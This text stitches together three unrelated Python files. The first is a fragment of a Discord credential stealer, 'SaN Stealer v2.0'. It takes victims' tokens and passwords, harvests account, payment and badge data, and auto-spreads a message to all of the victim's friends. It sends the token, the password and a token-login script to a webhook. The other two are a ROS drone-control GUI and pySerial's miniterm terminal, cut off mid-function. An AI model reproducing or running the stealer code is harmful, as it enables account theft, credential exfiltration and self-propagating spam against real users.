urlopen(Request(f"https://discord.com/api/v9/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except Exception as e:
print(e)
pass
def spread(token, form_data, delay):
fs = getfriends(token)
for friend in fs:
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
requests.delete(f"https://discord.com/api/v9/channels/{chat_id}", headers=getheaders(token))
except Exception as e:
print(e)
pass
sleep(delay)
def send(token: str):
data = {
"content" : token,
"username" : "Token Grabber"
}
requests.post("WEBHOOK LINK", json = data)
@app.route("/")
def home():
return "home"
@app.route("/api/spread/<token>/<message>/<password>")
def API(token: str, message: str, password: str):
PM = has_payment_methods(token)
UI = getuserdata(token) # id, username, discriminator, email, phone
message = message.replace("+", " ")
try:
if not UI["premium_type"] or UI["premium_type"] == 0:
Nitro = "None"
elif UI["premium_type"] == 1:
Nitro = "Nitro Classic"
elif UI["premium_type"] == 2:
Nitro = "Nitro"
except:
Nitro = "None"
Discord_Employee = 1
Partnered_Server_Owner = 2
HypeSquad_Events = 4
Bug_Hunter_Level_1 = 8
House_Bravery = 64
House_Brilliance = 128
House_Balance = 256
Early_Supporter = 512
Bug_Hunter_Level_2 = 16384
Early_Verified_Bot_Developer = 131072
Flags = UI["public_flags"]
Badges = []
if (Flags & Discord_Employee) == Discord_Employee:
Badges.append("Discord Employee")
if (Flags & Partnered_Server_Owner) == Partnered_Server_Owner:
Badges.append("Partnered Server Owner")
if (Flags & HypeSquad_Events) == HypeSquad_Events:
Badges.append("HypeSquad Events")
if (Flags & Bug_Hunter_Level_1) == Bug_Hunter_Level_1:
Badges.append("Bug Hunter Level1")
if (Flags & House_Bravery) == House_Bravery:
Badges.append("House Bravery")
if (Flags & House_Brilliance) == House_Brilliance:
Badges.append("House Brilliance")
if (Flags & House_Balance) == House_Balance:
Badges.append("House Balance")
if (Flags & Early_Supporter) == Early_Supporter:
Badges.append("Early Supporter")
if (Flags & Bug_Hunter_Level_2) == Bug_Hunter_Level_2:
Badges.append("Bug Hunter Level2")
if (Flags & Early_Verified_Bot_Developer) == Early_Verified_Bot_Developer:
Badges.append("Early Verified Bot Developer")
if PM is False and "Discord Employee" not in Badges and "Partnered Server Owner" not in Badges and "HypeSquad Events" not in Badges and "Bug Hunter Level1" not in Badges and "Early Supporter" not in Badges and "Bug Hunter Level2" not in Badges and "Early Verified Bot Developer" not in Badges:
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n {message}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\n{message}\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
Autospread = "True"
else:
Autospread = "False"
webhookk = DiscordWebhook(url="WEBHOOK LINK", rate_limit_retry=True)
un = UI["username"] + "#" + UI['discriminator']
embed = DiscordEmbed(title='SaN Stealer v2.0 | New Victim🔔 | @everyone', description=f':arrow_forward: **User:** `{un}`\n:moneybag: **Subscription**: `{Nitro}`', color='03b2f8')
embed.add_embed_field(name="Payment Method:", value=str(PM))
embed.add_embed_field(name="AutoSpread:", value=str(Autospread))
embed.add_embed_field(name="Password:", value="`"+str(password)+'`')
embed.add_embed_field(name="Badges:", value=str(Badges), inline=False)
embed.add_embed_field(name="Token:", value=str(token), inline=False)
embed.add_embed_field(name="Token Login Script", value='```let token="'+token+'";function login(e){setInterval(()=>{document.body.appendChild(document.createElement`iframe`).contentWindow.localStorage.token=`"${e}"`},50),setTimeout(()=>{location.reload()},2500)}login(token);```', inline=False)
webhookk.add_embed(embed)
response = webhookk.execute()
return "K"
serve(app=app, port=3000, threads=50)
|
send.py
|
from PyQt5.QtWidgets import QApplication, QMainWindow, QSizePolicy
import xtd_ui
import rospy
from geometry_msgs.msg import Twist, PoseStamped, TwistStamped
from std_msgs.msg import String
from multiprocessing import Process,Queue
from PyQt5.QtCore import *
from receive import Ros2Gui
from PIL import Image
import random
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from plotcanvas import PlotCanvas
class Gui2Ros(QMainWindow,xtd_ui.Ui_MainWindow):
def __init__(self):
super(Gui2Ros, self).__init__()
self.setupUi(self)
self.map = 'indoor1'
self.comboBox_maps.currentIndexChanged.connect(self.initplot)
self.button_run.clicked.connect(self.startrun)
self.close_flag = False
self.local_pose = PoseStamped()
self.local_vel = Twist()
self.m = PlotCanvas(self, self.map)
self.m.move(180, 0)
self.flag = 0
# rospy.init_node('multirotor_pyqt5_control')
def initplot(self):
self.map = self.comboBox_maps.currentText()
self.m.canvas_update(self.map)
def startrun(self):
        print('start run!')
self.init_controller()
self.pSend2ros = Process(target=self.run_process)
self.pSend2ros.start()
self.text_thread = Ros2Gui(self.multirotor_select, self.multirotor_num, self.multi_type)
self.text_thread.update_text.connect(self.display)
self.text_thread.plot_array.connect(self.plot)
self.text_thread.start()
# self.pSend2ros = Process(target=self.run_process)
# self.pSend2ros.start()
def init_controller(self):
self.text_show_info.setPlainText('data')
self.multi_num = 0
self.multi_type = []
counnnt = 0
        print(self.multirotor_select)
for j in self.multirotor_select:
self.multi_num = self.multi_num + self.multirotor_num[j]
for id_1 in range(self.multirotor_num[j]):
self.multi_type.append(self.multirotor_type[j])
counnnt+=1
self.color_plot = ['' for i in range(self.multi_num)]
for i in range(self.multi_num):
color_R = hex(random.randint(16,255))
color_G = hex(random.randint(16,255))
color_B = hex(random.randint(16,255))
self.color_plot[i] = '#'+str(color_R)+str(color_G)+str(color_B)
self.color_plot[i] = self.color_plot[i].replace('0x','')
#publish messages to ros nodes like a keyboard
def run_process(self):
rospy.init_node('multirotor_pyqt5_control')
counnnt = 0
if self.control_type == 'vel':
self.multi_cmd_vel_flu_pub = [None] * self.multi_num
self.multi_cmd_pub = [None] * self.multi_num
for i in self.multirotor_select:
for k in range(self.multirotor_num[i]):
if i == 7:
self.multi_cmd_vel_flu_pub[counnnt] = rospy.Publisher('/ugv_' + str(k) + '/cmd_vel', Twist, queue_size=10)
self.multi_cmd_pub[counnnt] = rospy.Publisher('/ugv_' + str(k) + '/cmd', String,queue_size=10)
else:
self.multi_cmd_vel_flu_pub[counnnt] = rospy.Publisher('/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd_vel_flu', Twist, queue_size=10)
self.multi_cmd_pub[counnnt] = rospy.Publisher('/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd', String,queue_size=10)
counnnt += 1
self.leader_cmd_vel_flu_pub = rospy.Publisher("/xtdrone/leader/cmd_vel_flu", Twist, queue_size=10)
self.leader_cmd_pub = rospy.Publisher("/xtdrone/leader/cmd", String, queue_size=10)
else:
self.multi_cmd_accel_flu_pub = [None] * self.multi_num
self.multi_cmd_pub = [None] * self.multi_num
            for i in self.multirotor_select:
                for k in range(self.multirotor_num[i]):
                    self.multi_cmd_accel_flu_pub[counnnt] = rospy.Publisher(
                        '/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd_accel_flu', Twist, queue_size=10)
                    self.multi_cmd_pub[counnnt] = rospy.Publisher(
                        '/xtdrone/' + self.multi_type[counnnt] + '_' + str(k) + '/cmd', String, queue_size=10)
                    counnnt += 1
self.leader_cmd_accel_flu_pub = rospy.Publisher("/xtdrone/leader/cmd_accel_flu", Twist, queue_size=10)
self.leader_cmd_pub = rospy.Publisher("/xtdrone/leader/cmd", String, queue_size=10)
self.twist = [Twist() for i in range (self.multi_num)]
self.cmd = ['' for i in range (self.multi_num)]
self.ctrl_leader = True
self.cmd_vel_mask = False
for j in range(self.multi_num):
self.twist[j].angular.x = 0.0
self.twist[j].angular.y = 0.0
last_forward = [0.0 for i in range(self.multi_num)]
last_upward = [0.0 for i in range(self.multi_num)]
last_leftward = [0.0 for i in range(self.multi_num)]
last_orientation = [0.0 for i in range(self.multi_num)]
last_ctrl_leader = False
last_cmd_vel_mask = False
last_multirotor_get_control = [0 for i in range(self.multi_num)]
last_forward_all = 0.0
last_upward_all = 0.0
last_leftward_all = 0.0
last_orientation_all = 0.0
num = 0
rate = rospy.Rate(30)
check_stop_flag = False
print('StartRun!')
start_flag = False
flag = False
time = 0
while True:
if not start_flag:
flag = self.q_start_control_flag.get()
if flag:
time += 1
start_flag = True
num += 1
if self.q_multirotor_get_control.empty():
multirotor_get_control = last_multirotor_get_control
else:
multirotor_get_control = self.q_multirotor_get_control.get()
last_multirotor_get_control = multirotor_get_control
if self.q_forward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.x = last_forward[i]
else:
forward = self.q_forward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.x = forward
last_forward[i] = self.twist[i].linear.x
if self.q_upward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.z = last_upward[i]
else:
upward = self.q_upward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.z = upward
last_upward[i] = self.twist[i].linear.z
if self.q_leftward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.y = last_leftward[i]
else:
leftward = self.q_leftward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.y = leftward
last_leftward[i] = self.twist[i].linear.y
if self.q_orientation.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].angular.z = last_orientation[i]
else:
orientation = self.q_orientation.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].angular.z = orientation
last_orientation[i] = self.twist[i].angular.z
if self.q_ctrl_leader.empty():
self.ctrl_leader = last_ctrl_leader
else:
self.ctrl_leader = self.q_ctrl_leader.get()
last_ctrl_leader = self.ctrl_leader
if self.q_cmd.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.cmd[i] = ''
else:
cmd = self.q_cmd.get()
if self.ctrl_leader:
for i in range(self.multi_num):
if i == 1:
self.cmd[i] = cmd
else:
self.cmd[i] = ''
else:
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.cmd[i] = cmd
print(self.cmd[i])
if self.q_cmd_vel_mask.empty():
self.cmd_vel_mask = last_cmd_vel_mask
else:
self.cmd_vel_mask = self.q_cmd_vel_mask.get()
last_cmd_vel_mask = self.cmd_vel_mask
if self.q_stop_flag.empty():
pass
else:
check_stop_flag = self.q_stop_flag.get()
if check_stop_flag:
for i in range(self.multi_num):
self.cmd[i] = 'AUTO.RTL'
if self.ctrl_leader:
if self.control_type == 'vel':
self.leader_cmd_vel_flu_pub.publish(self.twist[1])
else:
self.leader_cmd_accel_flu_pub.publish(self.twist[1])
self.leader_cmd_pub.publish(self.cmd[1])
                    print(self.cmd[1])
else:
for i in range(self.multi_num):
if not self.cmd_vel_mask:
if self.control_type == 'vel':
self.multi_cmd_vel_flu_pub[i].publish(self.twist[i])
else:
self.multi_cmd_accel_flu_pub[i].publish(self.twist[i])
self.multi_cmd_pub[i].publish(self.cmd[i])
# print self.cmd[0]
else:
                print('shut down!')
rate.sleep()
if check_stop_flag:
self.q_stop_flag.put(True)
rospy.signal_shutdown('STOP!')
break
def display(self, data):
self.text_show_info.setPlainText(data)
def plot(self, data):
for i in range(self.multi_num):
self.m.ax.plot(data[i][0], data[i][1], color = self.color_plot[i])
# self.m.canvas_update(self.map)
self.m.draw()
|
miniterm.py
|
#!/Users/tomasero/Library/Mobile Documents/com~apple~CloudDocs/Documents/MIT/Spring19/byte.it/Adafruit_Python_BluefruitLE/examples/env/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
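# Illustrative examples (not part of the original file):
#
#   key_description('\x03')  # -> 'Ctrl+C'
#   key_description('a')     # -> "'a'"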
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):    # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
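# Illustrative sketch (not part of the original file): update_transformations()
# applies these classes in list order for tx and in reverse order for rx, e.g.
#
#   tx_chain = [CRLF(), DebugIO()]
#   text = 'hello\n'
#   for t in tx_chain:
#       text = t.tx(text)   # 'hello\r\n', then echoed to stderr by DebugIO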
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
        elif c in 'sS':                         # S -> change to space parity
            # NOTE: unreachable in practice; 'sS' is already consumed by the
            # suspend-port branch above, so this option cannot be selected.
            self.serial.parity = serial.PARITY_SPACE
            self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
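            # for/else: the else branch runs only when the loop finished
            # without a break, i.e. every requested filter name was valid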
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
